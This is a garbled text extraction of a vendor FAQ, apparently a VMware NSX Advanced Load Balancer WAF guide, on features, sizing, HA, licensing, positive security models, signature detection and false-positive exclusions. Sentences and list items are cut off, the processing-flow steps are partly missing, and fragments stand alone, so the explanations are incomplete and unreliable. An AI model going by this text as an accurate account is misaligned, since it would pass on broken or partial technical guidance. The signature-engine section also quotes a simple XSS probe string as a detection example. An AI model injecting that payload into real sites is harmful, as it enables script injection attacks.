The WAF solutions to secure customer's application are as follows:n Security: Combine different verification methods to provide a comprehensive security layer
(Signatures, Positive Rules, Client Reputation, Machine Learning, Outlier analysis and others).
(Ansible, Terraform etc) and can be integrated into a SDLC (Secure Development Life Cycle).
and clients • Ease of use & Simplicity: WAF solution gathers data, learns from the data and
auto-tunes the policy or helps the admin to adjust the policy quickly. That is, WAF solution
has a "Make me secure" button in green.
measurements to validate it.What are the features provided as part of WAF ?
The WAF features are as follows:n OWASP Top 10 Protection
n Input Validation – XSS, SQLi etc.
n Positive security Model via Application Learning
n Scripting for application logic flaws - Using Data Scripts
n API protection for JSON, XML
n Simplified Policy Definition
n Elasticity and Automation
VMware NSX Advanced Load Balancer WAF GuideAlso, the security module includes more features as listed below:
n Application Rate Limiting
Does NSX ALB provide WAF as a service?
As of today, the WAF (or LB) is not offered as a cloud service and is deployed to the customer
environment. However, As-a-service offering is planned in the near future. The WAF (or LB) is
similar to a physical WAF in terms of on-prem deployment and has better operational, scale,
performance, and visibility. Also, NSX ALB offers Saas that includes WAF as part of LB offering.
For more information about SaaS refer to https://avinetworks.com/saas/What is the sizing recommendation for WAF ?
The performance and sizing recommendation for WAF is based on the type of application,
number of Headers, POST vs GET and so on. Due to this insufficient information, it is suggested
that an average number is considered as 800 RPS per Service Core and about 1600 RPS for two
Service Cores.What is the HA recommendation for WAF ?
As WAF solution is part of a large LB/ADC offering, the HA is definitely recommended for any
LB/WAF deployment. By default, it supports Active/Active HA and the other supported HA types
are Active/Standby and N+M.Do we need seperate license for WAF ?
Since WAF solution is part of a large LB/ADC offering, a separate license for WAF is not required.
However, make sure the SE sizing is adjusted based on the WAF.What is Positive Security Model ?
The "Positive Security Model" is also called as “Application specific policy”. It describes the
application behaviour and provides an input validation by setting an accepted range (and length)
of characters. If the input validation specification is not as expected then, it reports as a policy
violation.
request should look like (Part of)".
VMware NSX Advanced Load Balancer WAF GuideWhat does Signature Engine do ?
The Signature engine performs input validation by observing the input pattern that searches for
attack vectors.Example (simple XSS): attack="><script>alert(1)</script>
not look like".
The component "Allowlist" ensures if a request should either be checked or not by the WAF. For
example: the customers may prefer to bypass WAF for all POST requests to /upload.php.
In a system, Learning is a method of collecting statistical information of an application's normal
usage in order to generate a "Positive Security Model".What is WAF processing flow ?
The WAF processing flow is as follows:
condition then, the request is whitelisted i.e., WAF processing is turned off for that request.
is in line with the learnt data.3 If a request is marked as illegitimate by the positive security engine then, it is flagged/blocked
immediately.
engine which verifies by matching parts of the request against a valid signature in order to
identify the attack vector.6 If WAF is in Enforcement mode then, it block the requests.
What is False Positive ?
Sometimes a legitimate request is flagged as an attack. This may affect the business and also
develop fear among customers.
VMware NSX Advanced Load Balancer WAF GuideWhat is False negative ?
When an attack is not detected it is called as False negative. This affects the security but not the
business (in the perception of the user). However, the site continues to work.What is an exclusion for false positive mitigation ?
An exclusion adds a matching condition of <IP, URL, parameter> in front of a signature rule or a
rule group. In this way, a false positive that exists within the policy and application are not
triggered.You might also like